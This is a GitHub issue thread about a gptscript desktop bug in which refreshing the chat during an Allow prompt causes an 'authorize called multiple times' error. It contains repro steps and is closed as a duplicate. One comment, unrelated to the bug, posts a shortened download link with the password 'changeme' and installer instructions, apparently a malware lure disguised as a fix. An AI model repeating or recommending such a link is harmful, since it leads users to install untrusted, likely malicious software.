### ISSUE TITLE
Error state by click refresh chat when an Allow prompt is shown.

### ISSUE THREAD

**Issue by cjellick** [gptscript-ai/desktop#297]
You can see this behavior at 0:44:49 of this video or by looking in the transcript for
> Okay, refresh. Dang it. This is a bug. Um, refreshing when it's kind of waiting for a prompt puts it in a bad state.

https://www.loom.com/share/4c46566fc8c5437b93f125c6a87989ae

Steps to repro (roughly, watch the video for better context):
1. In assistant editor, get the chat pane to a state where its prompting you to Allow something
2. make a change to the assistant, like just update the prompt (not sure if this step is necessary)
3. Click the Refresh Chat

The chat pane gets an error that says "authorize called multiple times"

**Comment by cjellick** [comment]
should test this on the standalone chat page as well. If you refresh the chat there, do you get into this error state?

**Comment by sangee2004** [comment]
Same error is seen in this issue - https://github.com/gptscript-ai/desktop/issues/148

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by cjellick** [comment]
Agree, effectively the same issue...im going to close this issue and add this second way to repro in that issue
